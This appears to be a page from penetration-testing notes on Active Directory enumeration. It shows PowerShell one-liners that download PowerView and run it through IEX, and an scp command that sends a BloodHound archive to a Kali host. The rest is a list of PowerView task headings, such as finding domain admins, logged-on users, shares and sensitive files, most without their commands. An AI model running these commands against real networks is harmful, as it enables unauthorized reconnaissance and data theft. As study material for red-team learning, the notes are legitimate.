AD Enumeration

Files transfer

Linux to Windows

#from Linux to Windows
#Local
(new-object system.net.webclient).downloadstring('http://192.168.1.1/powerview.ps1') | IEX
#Remotly
(new-object system.net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1') | IEX

Windows to Linux

scp local_file username@hostname_or_ip:/remote/path
#Example
scp 20240830124156_BloodHound.zip kali@10.50.57.149:/var/www/uploads

PowerView Enumeration

Get current domain

Get-NetDomain

Get object of another domain

Get domain SID for the current domain

Get domain policy for the current domain

Get domain policy for another domain

Get domain controllers for the current domain

Get domain controllers for another domain

Get a list of users in the current domain

Get list of all properties for users in the current domain

Search for a particular string in a user's attributes

Get a list of computers in the current domain

Get all the groups in the current domain

Get all groups containing the word "admin" in group name

Get all the members of the Domain Admins group

Get the group membership for a user

List all the local groups on a machine (needs administrator privs on non-dc machines)

Get members of all the local groups on a machine (needs administrator privs on non-dc machines)

Get actively logged users on a computer (needs local admin rights on the target)

Get locally logged users on a computer (needs remote registry on the target - started by default on server OS)

Get the last logged user on a computer (needs administrative rights and remote registry on the target)

Find shares on hosts in the current domain.

Find sensitive files on computers in the domain

Get all fileservers of the domain

PreviousActive DirectoryNextUsers, Computer, Groups

Last updated